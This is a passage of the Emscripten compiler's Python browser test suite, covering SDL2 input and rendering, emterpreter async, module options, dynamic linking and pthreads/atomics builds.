open(os.path.join(self.get_dir(), 'sdl2_key.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_key.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_key.c'), '-o', 'page.html'] + defines + ['-s', 'USE_SDL=2','--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-s', 'NO_EXIT_RUNTIME=1']).communicate()
self.run_browser('page.html', '', '/report_result?37182145')
def test_sdl2_text(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(charCode) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keypress", true, true, window,
0, 0, 0, 0, 0, charCode);
document.body.dispatchEvent(event);
}
''')
open(os.path.join(self.get_dir(), 'sdl2_text.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_text.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-s', 'USE_SDL=2']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_sdl2_mouse(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
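// expose the helper on window so the compiled test code can invoke it by name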
window['simulateMouseEvent'] = simulateMouseEvent;
''')
open(os.path.join(self.get_dir(), 'sdl2_mouse.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_mouse.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_mouse.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'USE_SDL=2']).communicate()
self.run_browser('page.html', '', '/report_result?712', timeout=30)
def test_sdl2_mouse_offsets(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
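// expose the helper on window so the compiled test code can invoke it by name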
window['simulateMouseEvent'] = simulateMouseEvent;
''')
open(os.path.join(self.get_dir(), 'page.html'), 'w').write('''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear any content the browser may have restored from a previous session
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl2_mouse.js"></script>
</body>
</html>
''')
open(os.path.join(self.get_dir(), 'sdl2_mouse.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_mouse.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_mouse.c'), '-O2', '--minify', '0', '-o', 'sdl2_mouse.js', '--pre-js', 'pre.js', '-s', 'USE_SDL=2']).communicate()
self.run_browser('page.html', '', '/report_result?572')
def test_sdl2glshader(self):
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1'])
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '-s', 'LEGACY_GL_EMULATION=1'], also_proxied=True) # XXX closure fails on proxy
def test_sdl2_canvas_blank(self):
self.btest('sdl2_canvas_blank.c', reference='sdl_canvas_blank.png', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_palette(self):
self.btest('sdl2_canvas_palette.c', reference='sdl_canvas_palette.png', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_twice(self):
self.btest('sdl2_canvas_twice.c', reference='sdl_canvas_twice.png', args=['-s', 'USE_SDL=2'])
def zzztest_sdl2_gfx_primitives(self): # 'zzz' prefix keeps this test from being picked up by the runner
self.btest('sdl2_gfx_primitives.c', args=['-s', 'USE_SDL=2', '-lSDL2_gfx'], reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl2_canvas_palette_2(self):
open(os.path.join(self.get_dir(), 'args-r.js'), 'w').write('''
Module['arguments'] = ['-r'];
''')
open(os.path.join(self.get_dir(), 'args-g.js'), 'w').write('''
Module['arguments'] = ['-g'];
''')
open(os.path.join(self.get_dir(), 'args-b.js'), 'w').write('''
Module['arguments'] = ['-b'];
''')
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-r.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-g.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-b.js'])
def test_sdl2_swsurface(self):
self.btest('sdl2_swsurface.c', expected='1', args=['-s', 'USE_SDL=2'])
def test_sdl2_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl2_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'])
def test_sdl2_canvas_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
open('test.html', 'w').write(html)
open('data.txt', 'w').write('datum')
self.btest('sdl2_canvas_proxy.c', reference='sdl2_canvas.png', args=['-s', 'USE_SDL=2', '--proxy-to-worker', '--preload-file', 'data.txt', '-s', 'GL_TESTING=1'], manual_reference=True, post_build=post)
def test_sdl2_pumpevents(self):
# key events should be detected using SDL_PumpEvents
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
''')
self.btest('sdl2_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
def test_sdl2_timer(self):
self.btest('sdl2_timer.c', expected='5', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_size(self):
self.btest('sdl2_canvas_size.c', expected='1', args=['-s', 'USE_SDL=2'])
def test_sdl2_gl_read(self):
# SDL, OpenGL, readPixels
open(os.path.join(self.get_dir(), 'sdl2_gl_read.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_gl_read.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_gl_read.c'), '-o', 'something.html', '-s', 'USE_SDL=2']).communicate()
self.run_browser('something.html', '.', '/report_result?1')
def test_sdl2_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2','-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_fog_negative.c', reference='screenshot-fog-negative.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2','--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_fog_density.c', reference='screenshot-fog-density.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2','--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2','--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2','--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_unwasteful(self):
self.btest('sdl2_unwasteful.cpp', expected='1', args=['-s', 'USE_SDL=2', '-O1'])
def test_sdl2_canvas_write(self):
self.btest('sdl2_canvas_write.cpp', expected='0', args=['-s', 'USE_SDL=2'])
def test_sdl2_gl_frames_swap(self):
def post_build(*args):
self.post_manual_reftest(*args)
html = open('test.html').read()
html2 = html.replace('''Module['postRun'] = doReftest;''', '') # we don't want the very first frame
assert html != html2
open('test.html', 'w').write(html2)
self.btest('sdl2_gl_frames_swap.c', reference='sdl2_gl_frames_swap.png', args=['--proxy-to-worker', '-s', 'GL_TESTING=1', '-s', 'USE_SDL=2'], manual_reference=True, post_build=post_build)
def test_sdl2_ttf(self):
shutil.copy2(path_from_root('tests', 'freetype', 'LiberationSansBold.ttf'), self.get_dir())
self.btest('sdl2_ttf.c', reference='sdl2_ttf.png',
args=['-O2', '-s', 'USE_SDL=2', '-s', 'USE_SDL_TTF=2', '--embed-file', 'LiberationSansBold.ttf'],
message='You should see colorful "hello" and "world" in the window',
timeout=30)
def test_emterpreter_async(self):
for opts in [0, 1, 2, 3]:
print opts
self.btest('emterpreter_async.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-g2'])
def test_emterpreter_async_2(self):
self.btest('emterpreter_async_2.cpp', '40', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O3'])
def test_emterpreter_async_virtual(self):
for opts in [0, 1, 2, 3]:
print opts
self.btest('emterpreter_async_virtual.cpp', '5', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-profiling'])
def test_emterpreter_async_virtual_2(self):
for opts in [0, 1, 2, 3]:
print opts
self.btest('emterpreter_async_virtual_2.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'ASSERTIONS=1', '-s', 'SAFE_HEAP=1', '-profiling'])
def test_emterpreter_async_bad(self):
for opts in [0, 1, 2, 3]:
print opts
self.btest('emterpreter_async_bad.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'EMTERPRETIFY_BLACKLIST=["_middle"]', '-s', 'ASSERTIONS=1'])
def test_emterpreter_async_mainloop(self):
for opts in [0, 1, 2, 3]:
print opts
self.btest('emterpreter_async_mainloop.cpp', '121', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts)], timeout=20)
def test_emterpreter_async_with_manual(self):
for opts in [0, 1, 2, 3]:
print opts
self.btest('emterpreter_async_with_manual.cpp', '121', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'EMTERPRETIFY_BLACKLIST=["_acall"]'], timeout=20)
def test_emterpreter_async_sleep2(self):
self.btest('emterpreter_async_sleep2.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Oz'])
def test_emterpreter_async_sleep2_safeheap(self):
# check that safe-heap machinery does not cause errors in async operations
self.btest('emterpreter_async_sleep2_safeheap.cpp', '17', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Oz', '-profiling', '-s', 'SAFE_HEAP=1', '-s', 'ASSERTIONS=1', '-s', 'EMTERPRETIFY_WHITELIST=["_main","_callback","_fix"]'])
def test_sdl_audio_beep_sleep(self):
self.btest('sdl_audio_beep_sleep.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Os', '-s', 'ASSERTIONS=1', '-s', 'DISABLE_EXCEPTION_CATCHING=0', '-profiling', '-s', 'SAFE_HEAP=1'], timeout=60)
def test_mainloop_reschedule(self):
self.btest('mainloop_reschedule.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Os'], timeout=30)
def test_mainloop_infloop(self):
self.btest('mainloop_infloop.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1'], timeout=30)
def test_emterpreter_async_iostream(self):
self.btest('emterpreter_async_iostream.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1'])
def test_modularize(self):
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure', '1']]:
for args, code in [
([], 'Module();'), # defaults
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
if (typeof Module !== "undefined") throw "what?!"; // do not pollute the global scope, we are modularized!
        HelloWorld.noInitialRun = true; // erroneous module capture will load this and cause timeout
HelloWorld();
'''), # use EXPORT_NAME
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
var hello = HelloWorld({ noInitialRun: true, onRuntimeInitialized: function() {
setTimeout(function() { hello._main(); }); // must be async, because onRuntimeInitialized may be called synchronously, so |hello| is not yet set!
} });
'''), # pass in a Module option (which prevents main(), which we then invoke ourselves)
(['-s', 'EXPORT_NAME="HelloWorld"', '--memory-init-file', '0'], '''
var hello = HelloWorld({ noInitialRun: true});
hello._main();
'''), # similar, but without a mem init file, everything is sync and simple
]:
print 'test on', opts, args, code
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
open('test.c', 'w').write(self.with_report_result(src))
Popen([PYTHON, EMCC, 'test.c', '-s', 'MODULARIZE=1'] + args + opts).communicate()
open('a.html', 'w').write('''
<script src="a.out.js"></script>
<script>
%s
</script>
''' % code)
self.run_browser('a.html', '...', '/report_result?0')
def test_webidl(self):
# see original in test_core.py
output = Popen([PYTHON, path_from_root('tools', 'webidl_binder.py'),
path_from_root('tests', 'webidl', 'test.idl'),
'glue']).communicate()[0]
assert os.path.exists('glue.cpp')
assert os.path.exists('glue.js')
for opts in [[], ['-O1'], ['-O2']]:
print opts
self.btest(os.path.join('webidl', 'test.cpp'), '1', args=['--post-js', 'glue.js', '-I' + path_from_root('tests', 'webidl'), '-DBROWSER'] + opts)
def test_dynamic_link(self):
open('pre.js', 'w').write('''
Module.dynamicLibraries = ['side.js'];
''')
open('main.cpp', 'w').write(r'''
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <emscripten.h>
char *side(const char *data);
int main() {
char *temp = side("hello through side\n");
char *ret = (char*)malloc(strlen(temp)+1);
strcpy(ret, temp);
temp[1] = 'x';
EM_ASM({
Module.realPrint = Module.print;
Module.print = function(x) {
if (!Module.printed) Module.printed = x;
Module.realPrint(x);
};
});
puts(ret);
EM_ASM({ assert(Module.printed === 'hello through side', ['expected', Module.printed]); });
int result = 2;
REPORT_RESULT();
return 0;
}
''')
open('side.cpp', 'w').write(r'''
#include <stdlib.h>
#include <string.h>
char *side(const char *data);
char *side(const char *data) {
char *ret = (char*)malloc(strlen(data)+1);
strcpy(ret, data);
return ret;
}
''')
Popen([PYTHON, EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.js']).communicate()
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js'])
def test_dynamic_link_glemu(self):
open('pre.js', 'w').write('''
Module.dynamicLibraries = ['side.js'];
''')
open('main.cpp', 'w').write(r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
const char *side();
int main() {
const char *exts = side();
puts(side());
assert(strstr(exts, "GL_EXT_texture_env_combine"));
int result = 1;
REPORT_RESULT();
return 0;
}
''')
open('side.cpp', 'w').write(r'''
#include "SDL/SDL.h"
#include "SDL/SDL_opengl.h"
const char *side() {
SDL_Init(SDL_INIT_VIDEO);
SDL_SetVideoMode(600, 600, 16, SDL_OPENGL);
return (const char *)glGetString(GL_EXTENSIONS);
}
''')
Popen([PYTHON, EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.js']).communicate()
self.btest(self.in_dir('main.cpp'), '1', args=['-s', 'MAIN_MODULE=1', '-O2', '-s', 'LEGACY_GL_EMULATION=1', '--pre-js', 'pre.js'])
def test_memory_growth_during_startup(self):
open('data.dat', 'w').write('X' * (30*1024*1024))
self.btest('browser_test_hello_world.c', '0', args=['-s', 'ASSERTIONS=1', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'TOTAL_MEMORY=10000', '-s', 'TOTAL_STACK=5000', '--preload-file', 'data.dat'])
# pthreads tests
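  # Create a shell file that hides SharedArrayBuffer and Atomics, so that a
  # pthreads build can be exercised on its single-threaded fallback path.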
def prep_no_SAB(self):
open('html.html', 'w').write(open(path_from_root('src', 'shell_minimal.html')).read().replace('''<body>''', '''<body>
<script>
SharedArrayBuffer = undefined;
Atomics = undefined;
</script>
'''))
# Test that the emscripten_ atomics api functions work.
def test_pthread_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=120) # extra time on first test, to be sure to build all libraries
# Test 64-bit atomics.
def test_pthread_64bit_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_64bit_atomics.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test 64-bit C++11 atomics.
def test_pthread_64bit_cxx11_atomics(self):
for opt in [['-O0'], ['-O3']]:
for pthreads in [[], ['-s', 'USE_PTHREADS=1']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_64bit_cxx11_atomics.cpp'), expected='0', args=opt + pthreads + ['-std=c++11'], timeout=30)
# Test the old GCC atomic __sync_fetch_and_op builtin operations.
def test_pthread_gcc_atomic_fetch_and_op(self):
# We need to resort to using regexes to optimize out SharedArrayBuffer when pthreads are not supported, which is brittle!
# Therefore perform very extensive testing of different codegen modes to catch any problems.
for opt in [[], ['-O1'], ['-O2'], ['-O3'], ['-O3', '-s', 'AGGRESSIVE_VARIABLE_ELIMINATION=1'], ['-Os'], ['-Oz']]:
for debug in [[], ['-g1'], ['-g2'], ['-g4']]:
for f32 in [[], ['-s', 'PRECISE_F32=1']]:
print opt, debug, f32
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomic_fetch_and_op.cpp'), expected='0', args=opt+debug+f32+['-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=60)
# 64 bit version of the above test.
def test_pthread_gcc_64bit_atomic_fetch_and_op(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_64bit_atomic_fetch_and_op.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test the old GCC atomic __sync_op_and_fetch builtin operations.
def test_pthread_gcc_atomic_op_and_fetch(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomic_op_and_fetch.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# 64 bit version of the above test.
def test_pthread_gcc_64bit_atomic_op_and_fetch(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_64bit_atomic_op_and_fetch.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Tests the rest of the remaining GCC atomics after the two above tests.
def test_pthread_gcc_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomics.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test the __sync_lock_test_and_set and __sync_lock_release primitives.
def test_pthread_gcc_spinlock(self):
for arg in [[], ['-DUSE_EMSCRIPTEN_INTRINSICS']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_spinlock.cpp'), expected='800', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'] + arg, timeout=30)
# Test that basic thread creation works.
def test_pthread_create(self):
for opt in [['-O0'], ['-O3']]:
for pthreads in [['-s', 'USE_PTHREADS=1'], ['-s', 'USE_PTHREADS=2', '--separate-asm']]:
print str(opt) + ' ' + str(pthreads)
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create.cpp'), expected='0', args=opt + pthreads + ['-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
if 'USE_PTHREADS=2' in pthreads:
self.prep_no_SAB()
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create.cpp'), expected='0', args=opt + pthreads + ['-s', 'PTHREAD_POOL_SIZE=8', '--shell-file', 'html.html'], timeout=30)
# Test that a pthread can spawn another pthread of its own.
def test_pthread_create_pthread(self):
for opt in [['-s', 'USE_PTHREADS=2', '--separate-asm'], ['-s', 'USE_PTHREADS=1', '--proxy-to-worker']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create_pthread.cpp'), expected='1', args=opt + ['-O3', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'NO_EXIT_RUNTIME=1'], timeout=30)
# Test another case of pthreads spawning pthreads, but this time the callers immediately join on the threads they created.
def test_pthread_nested_spawns(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_nested_spawns.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=2'], timeout=30)
# Test that main thread can wait for a pthread to finish via pthread_join().
def test_pthread_join(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_join.cpp'), expected='6765', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'ERROR_ON_UNDEFINED_SYMBOLS=1'], timeout=30)
# Test pthread_cancel() operation
def test_pthread_cancel(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_cancel.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test pthread_kill() operation
def test_pthread_kill(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_kill.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test that pthread cleanup stack (pthread_cleanup_push/_pop) works.
def test_pthread_cleanup(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_cleanup.cpp'), expected='907640832', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Tests the pthread mutex api.
def test_pthread_mutex(self):
for arg in [[], ['-DSPINLOCK_TEST']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_mutex.cpp'), expected='50', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'] + arg, timeout=20)
# Test that memory allocation is thread-safe.
def test_pthread_malloc(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_malloc.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Stress test pthreads allocating memory that will call to sbrk(), and main thread has to free up the data.
def test_pthread_malloc_free(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_malloc_free.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'TOTAL_MEMORY=268435456'], timeout=30)
# Test that the pthread_barrier API works ok.
def test_pthread_barrier(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_barrier.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test the pthread_once() function.
def test_pthread_once(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_once.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test against a certain thread exit time handling bug by spawning tons of threads.
def test_pthread_spawns(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_spawns.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# It is common for code to flip volatile global vars for thread control. This is a bit lax, but nevertheless, test whether that
# kind of scheme will work with Emscripten as well.
def test_pthread_volatile(self):
for arg in [[], ['-DUSE_C_VOLATILE']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_volatile.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'] + arg, timeout=30)
# Test thread-specific data (TLS).
def test_pthread_thread_local_storage(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_thread_local_storage.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test the pthread condition variable creation and waiting.
def test_pthread_condition_variable(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_condition_variable.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test that pthreads are able to do printf.
def test_pthread_printf(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_printf.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=1'], timeout=30)
# Test that pthreads are able to do cout. Failed due to https://bugzilla.mozilla.org/show_bug.cgi?id=1154858.
def test_pthread_iostream(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_iostream.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=1'], timeout=30)
# Test that the main thread is able to use pthread_set/getspecific.
def test_pthread_setspecific_mainthread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_setspecific_mainthread.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm'], timeout=30)
self.prep_no_SAB()
